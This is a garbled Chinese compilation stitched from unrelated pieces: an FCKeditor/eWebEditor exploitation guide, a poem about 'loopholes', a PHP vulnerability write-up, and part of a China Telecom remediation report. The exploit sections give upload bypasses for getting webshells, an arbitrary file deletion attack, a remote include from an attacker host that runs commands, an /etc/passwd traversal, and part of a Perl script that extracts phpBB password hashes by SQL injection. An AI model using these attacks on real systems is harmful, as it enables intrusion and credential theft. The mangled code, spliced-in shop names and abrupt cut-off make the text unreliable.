第一篇:Fckeditor漏洞利用總結
Fckeditor漏洞利用總結
查看編輯器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2.Version 2.2 版本
Apache+linux 環境下在上傳文件后面加個.突破!測試通過。
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 For php 在處理pHp 上傳的地方并未對Media 類型進行上傳文件類型的控制,導致用戶上傳任意文件!將以下保存為html文件,修改action地址。
“%>利用上面說的遠程上傳的方式!可以得到webshell!成功率取決于,虛擬主機的安全設置!
11、任意文件刪除漏洞!
此漏洞存在于ExampleNewsSystem目錄下的delete.asp文件中,這是ewebeditor的測試頁面,無須登陸可以直接進入!看代碼
' 把帶”|“的字符串轉為數組
Dim aSavepathFileName
aSavepathFileName = Split(sSavepathFileName, ”|“)
' 刪除新聞相關的文件,從文件夾中
Dim i
For i = 0 To UBound(aSavepathFileName)
' 按路徑文件名刪除文件
Call DoDelFile(aSavepathFileName(i))
Next
而aSavepathFileName是前面從數據庫取出來的:
sSavepathFileName = oRs(”D_SavepathFileName“)
看看D_SavepathFileName是怎么添加到數據庫里的,在addsave.asp(modifysave.asp)里:sSavepathFileName = GetSafeStr(Request.Form(”d_savepathfilename“))
...oRs(”D_SavepathFileName“)= sSavepathFileName
居然過濾了,是GetSafeStr函數,再看看這個函數,在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), ”'“, ”“), Chr(34), ”“), ”;“, ”“)
End Function
既然路徑沒有過濾,那就可以直接定義了,構造一個提交頁面,其中d_savepathfilename自己任意賦值(要刪除多個文件,用|隔開即可)。試試../../eWebEditor.asp,提交后刪除該新聞,于是主目錄下的eWebEditor.asp不見了!漏洞利用:
新聞列表%20|%20增加新聞
增加新聞
http://127.0.0.1/editor/Example/NewsSystem/addsave.asp”
method=“post” name=“myform”>
要刪的文件(相對路徑就可以了): | |
新聞標題(隨便填): | |
標題圖片: | 當編輯區有插入圖片時,將自動填充此下拉框 |
新聞內容(隨便填): |
刪除文件漏洞一般是配合其他漏洞使用的,比如目錄遍歷
然后得到返回的新聞ID再提交:http://www.tmdps.cn/editor/example/newssystem/delete.asp?id=[id]
有幾個版本的ewebeditor 上傳類型是在 security.asp 文件控制的!直接刪除該文件可以上傳任意webshell!
12、其他!
其他說點什么呢!以上的辦法都是本人經驗和網上搜集!暫時就想到這些了,以后想到了再補全!說說aspx php jsp版本的利用吧!
ASpX版:
受影響文件:eWebEditorNet/upload.aspx
利用方法:添好本地的cer的Shell文件。在瀏覽器地址欄輸入javascript:lbtnUpload.click();就能得到shell。嘿嘿....繞過了限制......成功的上傳了ASpX文件....文件默認的上傳后保存的地址是eWebEditorNet/UploadFile/現在來看看是否上傳成功.....pHp版本:php版本和asp版本利用方式類似!不過php權限較高,不多廢話了!
jsp版本:網上有很多jsp的版本,根本沒有對上傳文件類型進行檢測!需要注意的是jsp版本的沒有上傳按鈕!直接選擇文件,回車就可以提交了!
第三篇:漏洞現代詩歌
閃電把漆黑的天幕
撕開一條漏洞
瞬間照亮了前方的路
雷響了,雨來了
淹沒了蟬鳴,蛙聲
我仍然站在暴雨中
是期待還是等待
沒有什么目標
只有讓閃電照耀
讓暴雨洗滌沾滿身驅的污垢
和疲憊不堪的肢體
我也記不清閃電劃過多少次
雷聲響過多少回
就好象數不清這生
有多少個漏洞
又失去多少個
可以擁有的機遇
上千個電話號碼
有幾個在你危難時
可以伸手相助
多少人鞍前馬后
有幾個能和你走到最后
春暖花開還訴說著情深似海
冬天一到便無影無蹤
也許上蒼給予這些眷顧
是你生命中注定的磨難
只能在這時才清醒
被雨澆透的輕松
總是在糾結過去了的往事
一個丟失
就成為一個漏洞
一個失敗
就鑄成終身憾事
用時間填補那些漏洞
用生命去等待
另一道閃電
照亮百孔千瘡的靈魂
這時才感到命運中的頑強
是彌補這些漏洞的良藥
在暴風雨中沖刷
在等待中找準方向
迎接一個嶄新的未來
第四篇:PHP網站漏洞的相關總結
PHP網站漏洞的相關總結
NB聯盟-zwell 從現在的網絡安全來看,大家最關注和接觸最多的WEB頁面漏洞應該是ASP了,在這方面,小竹是專家,我沒發言權.然而在PHP方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多.在這里,就跟大家來稍微的討論一下PHP頁面的相關漏洞吧.我對目前常見的PHP漏洞做了一下總結,大致分為以下幾種:包含文件漏洞,腳本命令執行漏洞,文件泄露漏洞,SQL注入漏洞等幾種.當然,至于COOKIE欺騙等一部分通用的技術就不在這里討論了,這些資料網上也很多.那么,我們就一個一個來分析一下怎樣利用這些漏洞吧!首先,我們來討論包含文件漏洞.這個漏洞應該說是PHP獨有的吧.這是由于不充分處理外部提供的惡意數據,從而導致遠程攻擊者可以利用這些漏洞以WEB進程權限在系統上執行任意命令.我們來看一個例子:假設在a.php中有這樣一句代碼: 在這段代碼中,$include一般是一個已經設置好的路徑,但是我們可以通過自己構造一個路徑來達到攻擊的目的.比方說我們提交:a.php?include=http://web/b.php,這個web是我們用做攻擊的空間,當然,b.php也就是我們用來攻擊的代碼了.我們可以在b.php中寫入類似于:passthru(“/bin/ls /etc”);的代碼.這樣,就可以執行一些有目的的攻擊了.(注:web服務器應該不能執行php代碼,不然就出問題了.相關詳情可以去看<<如何對PHP程序中的常見漏洞進行攻擊>>).在這個漏洞方面,出狀況的很多,比方說:PayPal Store Front, HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.接著,我們再來看一下腳本命令執行漏洞.這是由于對用戶提交的URI參數缺少充分過濾,提交包含惡意HTML代碼的數據,可導致觸發跨站腳本攻擊,可能獲得目標用戶的敏感信息。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的: http://web/index.php?PHPSESSID=“>在script里面我們可以構造函數來獲得用戶的一些敏感信息.在這個漏洞方面相對要少一點,除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.再然后,我們就來看看文件泄露漏洞了.這種漏洞是由于對用戶提交參數缺少充分過濾,遠程攻擊者可以利用它進行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發現的phpMyAdmin來做例子.在phpMyAdmin中,export.php頁面沒有對偉創電腦維修用戶提交的'what'參數進行充分過濾,遠程攻擊者提交包含多個'../'字符的數據,便可繞過WEB ROOT限制,以WEB權限查看系統上的任意文件信息。比方說打入這樣一個地址:export.php?what=../../../../../../etc/passwd%00 就可以達到文件泄露的目的了.在這方面相對多一點,有:myPHPNuke,McNews等等.最后,我們又要回到最興奮的地方了.想想我們平時在asp頁面中用SQL注入有多么爽,以前還要手動注入,一直到小竹悟出”SQL注入密笈“(嘿嘿),然后再開做出NBSI以后,我們NB聯盟真是拉出一片天空.曾先后幫CSDN,大富翁論壇,中國頻道等大型網站找出漏洞.(這些廢話不多說了,有點跑題了...).還是言規正傳,其實在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個函數就好了.將asc改成ASCII,len改成LENGTH,其他函數基本不變了.其實大家看到PHP的SQL注入,是不是都會想到PHP-NUKE和PHPBB呢?不錯,俗話說樹大招分,像動網這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發現的安全漏洞也就越多了.PHPBB也是一樣的,現在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB.它的漏桂林偉創電腦洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發現漏洞,到現在最近的phpBB 2.0.6版本的groupcp.php,以及之前發現的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個樣子吧.這也一直導致,一部分人在研究php漏洞的時候都會拿它做實驗品,所謂百練成精嘛,相信以后的PHPBB會越來越好.好了,我們還是來分析一下漏洞產生的原因吧.拿viewtopic.php頁面來說,由于在調用viewtopic.php時,直接從GET請求中獲得”topic_id“并傳遞給SQL查詢命令,而并沒有進行一些過濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼,獲得此密碼信息可以用于自動登錄或者進行暴力破解。(我想應該不會有人想去暴力破解吧,除非有特別重要的原因).先看一下相關源代碼: # if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))# { # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);# } # else if(isset($HTTP_GET_VARS['topic']))# { # $topic_id = intval($HTTP_GET_VARS['topic']);# } 從上面我們可以看出,如果提交的view=newest并且sid設置了值的話,執行的查詢代碼像下面的這個樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對著這里來看,受影響系統為:phpBB 2.0.5和phpBB 2.0.4).# $sql = ”SELECT p.post_id # FROM “.POSTS_TABLE.” p, “.SESSIONS_TABLE.” s, “.USERS_TABLE.” u # WHERE s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 1“;Rick提供了下面的這斷測試代碼: use IO::Socket;$remote = shift || 'localhost';$view_topic = shift || '/phpBB2/viewtopic.php';$uid = shift || 2;$port = 80;$dbtype = 'mysql4';# mysql4 or pgsql print ”Trying to get password hash for uid $uid server $remote dbtype: $dbtypen“;$p = ”“;for($index=1;$index<=32;$index++){ $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => ”tcp“, Type => SOCK_STREAM)or die ”Couldnt connect to $remote:$port : $@n“;$str = ”GET $view_topic“.”?sid=1&topic_id=-1“.random_encode(make_dbsql()).”&view=newest“.” HTTP/1.0nn“;print $socket $str;print $socket ”Cookie: phpBB2mysql_sid=1n“;# replace this for pgsql or remove it print $socket ”Host: $remotenn“;while($answer = <$socket>){ if($answer =~ /location:.*x23(d+)/)# Matches the location: viewtopic.php?p=
第五篇:javaWeb安全驗證漏洞修復總結
EMA服務管理平臺二期擴容安全驗收
漏洞修復總結
2011年5月
中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結
目 錄 2 WEB安全介紹..........................................................................................................................1 SQL注入、盲注.......................................................................................................................1 2.1 SQL注入、盲注概述.................................................................................................................1 2.2 2.4 3 安全風險及原因...................................................................................................................2 應用程序解決方案...............................................................................................................4 2.3 APPSCAN掃描建議......................................................................................................................2
會話標識未更新.......................................................................................................................7 3.1 3.2 3.4 會話標識未更新概述...........................................................................................................7 安全風險及原因分析...........................................................................................................8 應用程序解決方案...............................................................................................................8 3.3 APPSCAN掃描建議......................................................................................................................8 已解密登錄請求.......................................................................................................................9 4.1 4.2 4.4 已解密登錄請求概述...........................................................................................................9 安全風險及原因分析...........................................................................................................9 應用程序解決方案...............................................................................................................9 4.3 APPSCAN掃描建議......................................................................................................................9 跨站點請求偽造.....................................................................................................................11 5.1 5.2 5.4 跨站點請求偽造概述.........................................................................................................11 安全風險及原因分析.........................................................................................................12 應用程序解決方案.............................................................................................................13 5.3 APPSCAN掃描建議....................................................................................................................13 不充分賬戶封鎖.....................................................................................................................13 6.1 6.2 6.4 不充分賬戶封鎖概述.........................................................................................................13 安全風險及原因分析.........................................................................................................13 應用程序解決方案.............................................................................................................14 6.3 APPSCAN掃描建議....................................................................................................................14 啟用不安全HTTP方法...........................................................................................................14 7.1 7.2 7.4 啟用不安全HTTP方法概述...............................................................................................14 安全風險及原因分析.........................................................................................................15 應用程序解決方案.............................................................................................................15 7.3 APPSCAN掃描建議....................................................................................................................15 HTTP注釋敏感信息...............................................................................................................16 8.1 HTTP注釋敏感信息概述........................................................................................................16 8.2 8.4 安全風險及原因分析.........................................................................................................16 應用程序解決方案.............................................................................................................17 8.3 APPSCAN掃描建議....................................................................................................................16 發現電子郵件地址模式.........................................................................................................17
中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結
9.1 9.2 9.4 10 發現電子郵件地址模式概述.............................................................................................17 安全風險及原因分析.........................................................................................................17 應用程序解決方案.............................................................................................................17 9.3 APPSCAN掃描建議....................................................................................................................17
通過框架釣魚.........................................................................................................................20
通過框架釣魚概述.............................................................................................................20 安全風險及原因分析.........................................................................................................20 APPSCAN掃描建議...............................................................................................................21 應用程序解決方案.............................................................................................................23 10.1 10.2 10.3 10.4 11 檢查到文件替代版本.............................................................................................................25
檢查到文件替代版本概述.................................................................................................25 安全風險及原因分析.........................................................................................................26 APPSCAN掃描建議...............................................................................................................26 應用程序解決方案.............................................................................................................26 11.1 11.2 11.3 11.4
中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 Web安全介紹
目前很多業務都依賴于互聯網,例如說網上銀行、網絡購物、網游等,很多惡意攻擊者出于不良的目的對Web 服務器進行攻擊,想方設法通過各種手段獲取他人的個人賬戶信息謀取利益。正是因為這樣,Web業務平臺最容易遭受攻擊。同時,對Web服務器的攻擊也可以說是形形色色、種類繁多,常見的有掛馬、SQL注入、緩沖區溢出、嗅探、利用IIS等針對Webserver漏洞進行攻擊。
一方面,由于TCP/IP的設計是沒有考慮安全問題的,這使得在網絡上傳輸的數據是沒有任何安全防護的。攻擊者可以利用系統漏洞造成系統進程緩沖區溢出,攻擊者可能獲得或者提升自己在有漏洞的系統上的用戶權限來運行任意程序,甚至安裝和運行惡意代碼,竊取機密數據。而應用層面的軟件在開發過程中也沒有過多考慮到安全的問題,這使得程序本身存在很多漏洞,諸如緩沖區溢出、SQL注入等等流行的應用層攻擊,這些均屬于在軟件研發過程中疏忽了對安全的考慮所致。
另一方面,用戶對某些隱秘的東西帶有強烈的好奇心,一些利用木馬或病毒程序進行攻擊的攻擊者,往往就利用了用戶的這種好奇心理,將木馬或病毒程序捆綁在一些艷麗的圖片、音視頻及免費軟件等文件中,然后把這些文件置于某些網站當中,再引誘用戶去單擊或下載運行?;蛘咄ㄟ^電子郵件附件和QQ、MSN等即時聊天軟件,將這些捆綁了木馬或病毒的文件發送給用戶,利用用戶的好奇心理引誘用戶打開或運行這些文件、SQL注入、盲注 2.1 SQL注入、盲注概述
Web 應用程序通常在后端使用數據庫,以與企業數據倉庫交互。查詢數據庫事實上的標準語言是 SQL(各大數據庫供應商都有自己的不同版本)。Web 應用程序通常會獲取用戶輸入(取自 HTTP 請求),將它并入 SQL 查詢中,然后發送到后端數據庫。接著應用程序便處理查詢結果,有時會向用戶顯示結果。如果應用程序對用戶(攻擊者)的輸入處理不夠小心,攻擊者便可以利用這種操作方式。在此情況下,攻擊者可以注入惡意的數據,當該數據并入 SQL 查詢中時,就將查詢的原始語法更改得面目全非。例如,如果應用程序使用用戶的輸入(如用戶名和密碼)來查詢用戶帳戶的數據庫表,以認證用戶,而攻擊者能夠將惡意數據注入查詢的用戶名部分(和/或密碼部分),查詢便可能更改成 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結
完全不同的數據復制查詢,可能是修改數據庫的查詢,或在數據庫服務器上運行 Shell 命令的查詢。2.2 安全風險及原因
高風險漏洞,攻擊者可能會查看、修改或刪除數據庫條目和表
原因:未對用戶輸入正確執行危險字符清理
2.3 AppScan掃描建議
若干問題的補救方法在于對用戶輸入進行清理。通過驗證用戶輸入未包含危險字符,便可能防止惡意的用戶導致應用程序執行計劃外的任務,例如:啟動任意 SQL 查詢、嵌入將在客戶端執行的 Javascript 代碼、運行各種操作系統命令,等等。建議過濾出所有以下字符: [1] |(豎線符號)[2] &(& 符號)[3];(分號)
[4] $(美元符號)[5] %(百分比符號)[6] @(at 符號)[7] '(單引號)[8] “(引號)
[9] '(反斜杠轉義單引號)[10] ”(反斜杠轉義引號)[11] <>(尖括號)[12]()(括號)[13] +(加號)
[14] CR(回車符,ASCII 0x0d)[15] LF(換行,ASCII 0x0a)[16] ,(逗號)[17](反斜杠)
以下部分描述各種問題、問題的修訂建議以及可能觸發這些問題的危險字符: SQL 注入和 SQL 盲注:
A.確保用戶輸入的值和類型(如 Integer、Date 等)有效,且符合應用程序預期。
B.利用存儲過程,將數據訪問抽象化,讓用戶不直接訪問表或視圖。當使用存儲過程時,請利用 ADO 命令對象來實施它們,以強化變量類型。C.清理輸入以排除上下文更改符號,例如: [1] '(單引號)[2] “(引號)
[3] '(反斜線轉義單引號)中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結
[4] ”(反斜杠轉義引號)[5])(結束括號)[6];(分號)跨站點腳本編制:
A.清理用戶輸入,并過濾出 JavaScript 代碼。我們建議您過濾下列字符: [1] <>(尖括號)[2] “(引號)[3] '(單引號)[4] %(百分比符號)[5];(分號)[6]()(括號)[7] &(& 符號)[8] +(加號)
B.如果要修訂 <%00script> 變體,請參閱 MS 文章 821349 C.對于 UTF-7 攻擊: [-] 可能的話,建議您施行特定字符集編碼(使用 'Content-Type' 頭或 標記)。
HTTP 響應分割:清理用戶輸入(至少是稍后嵌入在 HTTP 響應中的輸入)。請確保輸入未包含惡意的字符,例如: [1] CR(回車符,ASCII 0x0d)[2] LF(換行,ASCII 0x0a)遠程命令執行:清理輸入以排除對執行操作系統命令有意義的符號,例如: [1] |(豎線符號)[2] &(& 符號)[3];(分號)
執行 shell 命令:
A.絕不將未檢查的用戶輸入傳遞給 eval()、open()、sysopen()、system()之類的 Perl 命令。
B.確保輸入未包含惡意的字符,例如: [1] $(美元符號)[2] %(百分比符號)[3] @(at 符號)
XPath 注入:清理輸入以排除上下文更改符號,例如: [1] '(單引號)[2] ”(引號)等 LDAP 注入:
A.使用正面驗證。字母數字過濾(A..Z,a..z,0..9)適合大部分 LDAP 查詢。B.應該過濾出或進行轉義的特殊 LDAP 字符: [1] 在字符串開頭的空格或“#”字符 [2] 在字符串結尾的空格字符 [3] ,(逗號)[4] +(加號)[5] “(引號)[6](反斜杠)[7] <>(尖括號)中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結
[8];(分號)[9]()(括號)MX 注入:
應該過濾出特殊 MX 字符: [1] CR(回車符,ASCII 0x0d)
[2] LF(換行,ASCII 0x0a)記錄偽造: 應該過濾出特殊記錄字符: [1] CR(回車符,ASCII 0x0d)[2] LF(換行,ASCII 0x0a)[3] BS(退格,ASCII 0x08)ORM 注入:
A.確保用戶輸入的值和類型(如 Integer、Date 等)有效,且符合應用程序預期。
B.利用存儲過程,將數據訪問抽象化,讓用戶不直接訪問表或視圖。C.使用參數化查詢 API D.清理輸入以排除上下文更改符號,例如:(*): [1] '(單引號)[2] ”(引號)
[3] '(反斜線轉義單引號)[4] “(反斜杠轉義引號)[5])(結束括號)[6];(分號)2.4 應用程序解決方案
1、我們為了調試方便,在頁面上會拋出數據庫異常信息,如果入侵工具獲取了這些信息,就可以獲取系統的一些配置信息,如web系統框架、采用的數據庫等,從而找出系統漏洞。所以不要在頁面上拋出異常的詳細信息,這些信息對客戶并沒有用,只是方便技術人員調試罷了,處理方法是在異常處理頁面把打印異常代碼刪除即可;
2、新建一個過濾器,通過過濾器過濾SQL注入特殊字符,配置成功后,重啟服務,用Appsan工具掃描,漏洞得到解決,通過過濾器可以解決SQL注入、跨站點腳本編制及通過框架釣魚等問題,具體實現方式如下:
1、在web.xml文件中配置過濾器
2、過濾器過濾代碼
public class InjectFilter extends IsmpServletFilter {
private String failPage = ”/loginout.jsp“;//發生注入時,跳轉頁面
public void doFilter(ServletRequest request,ServletResponse response,FilterChain filterchain)throws IOException, ServletException { //判斷是否有注入攻擊字符
HttpServletRequest req =(HttpServletRequest)request;
String inj = injectInput(req);if(!inj.equals(”“)){ request.getRequestDispatcher(failPage).forward(request, return;response);} else { // 傳遞控制到下一個過濾器
filterchain.doFilter(request, response);} } /** * 判斷request中是否含有注入攻擊字符 * @param request * @return */ public String injectInput(ServletRequest request){
Enumeration e = request.getParameterNames();String attributeName;String attributeValues[];String inj = ”“;
while(e.hasMoreElements()){ attributeName =(String)e.nextElement();//不對密碼信息進行過濾,一般密碼中可以包含特殊字符
if(attributeName.equals(”userPassword“)||attributeName.equals(”co
||attributeName.equals(“password”)||attributeName.equals(“PASSWOR continue;nfirmPassword”)||attributeName.equals(“PASSWORD”)D2“)||attributeName.equals(”valiPassword“)){ 5 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結
}
attributeValues = request.getParameterValues(attributeName);
for(int i = 0;i < attributeValues.length;i++){
if(attributeValues[i]==null||attributeValues[i].equals(”“))
continue;
inj = injectChar(attributeValues[i]);
if(!inj.equals(”“)){
return inj;
}
} } return inj;} /** * 判斷字符串中是否含有注入攻擊字符 * @param str * @return */ public String injectChar(String str){
String inj_str = ”“)' * %”;String inj_stra[] = inj_str.split(“ ”);
for(int i = 0;i < inj_stra.length;i++){ if(str.indexOf(inj_stra[i])>=0){ return inj_stra[i];} } return “";}
}
中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 會話標識未更新 3.1 會話標識未更新概述
“會話固定”是一種攻擊技術,會強制用戶的會話標識變成顯式值。固定會話標識值的技術有許多種,會隨著目標 Web 站點的功能而不同。從利用“跨站點腳本編制”到向 Web 站點密集發出先前生成的 HTTP 請求,都在這些技術范圍內。用戶的會話標識固定之后,攻擊者會等待用戶登錄,然后利用預定義的會話標識值來假定用戶的聯機身份。
一般而言,對于標識值的會話管理系統有兩種類型。第一種類型是“寬容”系統,可讓 Web 瀏覽器指定任何標識。第二種類型是“嚴格”系統,只接受服務器端生成的值。當使用寬容系統時,不需要聯系 Web 站點,便可以維護任何會話標識。在嚴格系統中,攻擊者需要維護“陷阱會話”并且必須定期聯系 Web 站點,才能防止閑置超時。對于會話固定,倘若沒有活動保護,使用會話來識別已認證的用戶的任何 Web 站點都可能受到攻擊。使用會話標識的 Web 站點通常都是基于 cookie 的站點,但也會使用 URL 和隱藏的表單字段。不幸的是,基于 cookie 的會話最容易受到攻擊。目前已識別的大多數攻擊方法都是針對 cookie 的固定。相對于在用戶登錄 Web 站點之后,再竊取用戶的會話標識,會話固定提供的機會多得多。
在用戶登錄之前,攻擊的活動部分便已啟動。
會話固定攻擊過程通常由三個步驟組成:
1)安裝會話
攻擊者針對目標 Web 站點設下“陷阱會話”,并獲取這個會話的標識,攻擊者也可以選擇攻擊中所用的任意會話標識。在某些情況下,必須反復聯系 Web 站點,才能維護確定好的陷阱會話值。
2)固定會話
攻擊者將陷阱會話值引進用戶的瀏覽器中,固定用戶的會話標識。
3)進入會話
用戶登錄目標 Web 站點之后,當使用固定會話標識值時,攻擊者便可加以接管?!?/p>
修改
對于這類問題解決方案為在用戶進入登錄頁面時清空session讓cookie過期
request.getSession(true).invalidate();//清空session Cookie cookie = request.getCookies()[0];//獲取cookie cookie.setMaxAge(0);//讓cookie過期
另外一種方式利用JSP的一些特性,不讓登錄頁面產生Session <% page session=”false” %> 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結
3.2 安全風險及原因分析
高風險漏洞,可能會竊取或操縱客戶會話和 cookie,它們可能用于模仿合法用戶,從而使黑客能夠以該用戶身份查看或變更用戶記錄以及執行事務
原因:Web 應用程序編程或配置不安全
3.3 AppScan掃描建議
始終生成新的會話,供用戶成功認證時登錄。防止用戶操縱會話標識。
請勿接受用戶瀏覽器登錄時所提供的會話標識
3.4 應用程序解決方案
會話標識未更新,Appscan給出的描述是建議用戶每次登錄時需使用新的會話標識。應用程序實現上就是在登錄模塊,添加以下代碼,即用戶登錄后,重新生成會話。
HttpSession session = request.getSession(false);if(session!=null){ //讓cookie過期
session.invalidate();
Cookie cookie = request.getCookies()[0];//獲取cookie
cookie.setMaxAge(0);//讓cookie過期 } request.getSession(true);//生成新會話
經過測試,這段代碼只在weblogic和tomcat下才有效,在公司中間件webspeed及jboss6.0下問題都依然存在,但從掃描的結果信息分析看,漏洞已經解決,分析判斷應該只是session處理機制不同,AppScan工具仍認為存在漏洞風險。在與電信溝通中我們存在一個經驗教訓大家一定要吸取,不能過渡迷信流行的自動化測試工具,尤其是對于Appscan這種判斷防御行為的復雜軟件,僅靠有限的規則設置就當做是web安全的唯一標準這顯然不太合理,這種情況一定要與測試方溝通解釋。
另一方面,對于公司的產品webspeed,也想提點建議,商務項目采用公司的產品為公司節約了不少成本,但是我們產品后續升級維護也必須重視起來,當確認出是webspeed本身問題后,聯系vasg相關人員進行協調解決,根本沒有非常了解該產品技術人員支持,只是一個剛入職的同事在配合測試。調試了一周時間仍不能解決,最后只能作為一個遺留問題擱置。公司一直在向產品化轉變,但是自身的產品維護、升級、管理仍然需要改進。
中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 已解密登錄請求 4.1 已解密登錄請求概述
在應用程序測試過程中,檢測到將未加密的登錄請求發送到服務器。由于登錄過程所用的部分輸入字段(例如:用戶名、密碼、電子郵件地址、社會保險號碼,等等)是個人敏感信息,建議通過加密連接(如 SSL)將其發送到服務器。任何以明文傳給服務器的信息都可能被竊,稍后可用來電子欺騙身份或偽裝用戶。此外,若干隱私權法規指出,用戶憑證之類的敏感信息一律以加密方式傳給網站。
4.2 安全風險及原因分析
安全風險中,可能會竊取諸如用戶名和密碼等未經加密即發送了的用戶登錄信息
原因:諸如用戶名、密碼和信用卡號之類的敏感輸入字段未經加密即進行了傳 遞
4.3 AppScan掃描建議
1.確保所有登錄請求都以加密方式發送到服務器。2.請確保敏感信息,例如:密碼
-社會保險號碼駕照號碼
-電子郵件地址郵政編碼
一律以加密方式傳給服務器。4.4 應用程序解決方案
已解密的登錄請求,要求就是數據要加密傳輸。最簡單有效的解決方式采用SSL加密協議傳輸,但是由于EMA服務管理平臺業務的特殊性,采用SSL加密方式對現有的業務影響太大,所以最終沒有采用此種方式解決該問題,但個人在進行測試過程中也嘗試在tomcat和jboss下SSL方式配置,寫下來供參考。
中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結
Jboss內核也是tomcat,所以兩者配置基本都是一樣,都是在生成證書文件后,在service.xml 進行配置:
1.進入到cmd 進入到jdk bin目錄下執行keytool-genkey-alias tomcat-keyalg RSA-keystore webspeed.keystore 生成證書 2.在service.xml配置SSL keystoreFile=”C:tomcat-5.5.26confwebspeed.keystore“ keystorePass=”1111aaaa“/> 這樣配置后雖然可以通過https訪問,但仍然還可以通過8080使用普通的http訪問,所以還必須禁止普通模式登錄。所以還得在web.xml添加配置。01 “跨站點偽造請求(CSRF)”攻擊可讓黑客以受害者的名義在易受攻擊的站點上運行操作。當易受攻擊的站點未適當驗證請求來源時,便可能出現這個攻擊。這個漏洞的嚴重性取決于受影響的應用程序的功能,例如,對搜索頁面的 CSRF 攻擊,嚴重性低于對轉帳頁面或概要更新頁面的 CSRF 攻擊。 這項攻擊的執行方式,是強迫受害者的瀏覽器向易受攻擊的站點發出 HTTP 請求。如果用戶目前已登錄受害者站點,請求會自動使用用戶的憑證(如會話 Cookie、用戶的 IP 地址,以及其他瀏覽器認證方法)。攻擊者利用這個方法來偽造受害者的身份,再代替他來提交操作。換句話來說,易受攻擊的站點未采取適當措施來驗證用戶實際是否想執行特定操作。強迫受害者發送非預期的請求,方法有許多種: -通過電子郵件向受害者發送易受攻擊應用程序的惡意鏈接。在公共論壇中,張貼易受攻擊站點的鏈接。中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 -利用站點(或另一個站點)的“跨站點腳本編制”或“鏈接注入”漏洞,將瀏覽器自動重定向到易受攻擊的站點。 如果攻擊者利用易受攻擊的站點本身的“鏈接注入”漏洞,可以增加用戶通過站點認證的可能性,進而增加攻擊成功的可能性。 例如,攻擊者可以利用上述任何選項來誘惑受害者查看含有下列條目的頁面: 這會使受害者的瀏覽器自動請求 URL 及瀏覽器的當前憑證。如果這個銀行業站點易受到 CSRF 攻擊,它會根據應用程序邏輯,從受害者的帳戶中,將 1000 美元轉賬到 John 的銀行帳戶。“跨站點偽造請求”攻擊也稱為 CSRF(發音為 C-Serf)、XSRF、“跨站點偽造引用”、“單鍵攻擊”以及“會話騎乘”。您可以利用下列方式來驗證您的應用程序是否易受到 CSRF 攻擊: [1] 檢查易受攻擊的鏈接/請求是否未包括攻擊者難以猜中的參數 [2] 檢查易受攻擊的鏈接/請求是否會執行只應自愿執行的操作 含有用戶在不知不覺中提交的請求所能直接訪問的敏感操作的應用程序,被視為很容易遭受 CSRF 攻擊。CSRF 也可能出現在登錄頁面和注銷頁面上。由于攻擊者可以偽造來自受害者的連續注銷請求,因此 CSRF 可能導致服務拒絕。在登錄頁面上,CSRF 可以允許攻擊者使用包含攻擊者用戶名和密碼的偽造請求來將客戶機登錄到攻擊者的賬戶中。登錄 CSRF 攻擊會帶有嚴重的后果,這取決于其他站點行為。例如,如果站點保留了用戶操作的歷史記錄(例如搜索歷史記錄),那么攻擊者將能夠在易受攻擊的站點上查看受害者之前執行的操作。5.2 安全風險及原因分析 安全風險中,可能會竊取或操縱客戶會話和 cookie,它們可能用于模仿合法用戶,從而使黑客能夠以該用戶身份查看或變更用戶記錄以及執行事務 原因:應用程序使用的認證方法不充分 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 5.3 AppScan掃描建議 如果要避免 CSRF 攻擊,每個請求都應該包含唯一標識,它是攻擊者所無法猜測的參數。建議的選項之一是添加取自會話 cookie 的會話標識,使它成為一個參數。服務器必須檢查這個參數是否符合會話 cookie,若不符合,便廢棄請求。攻擊者無法猜測這個參數的原因是應用于 cookie 的“同源策略”,因此,攻擊者無法偽造一個虛假的請求,讓服務器誤以為真。攻擊者難以猜測且無法訪問的任何秘密(也就是無法從其他域訪問),都可用來替換會話標識。這可以防止攻擊者設計看似有效的請求。 5.4 應用程序解決方案 已解密的登錄請求,要求就是數據要加密傳輸。最簡單有效的解決方式采用SSL加密協議傳輸,但是由于EMA服務管理平臺業務的特殊性,采用SSL加密方式對現有的業務影響太大,所以最終沒有采用此種方式解決該問題,但個人在進行測試過程中也嘗試在tomcat和jboss下SSL方式配置,寫下來供參考。6 不充分賬戶封鎖 6.1 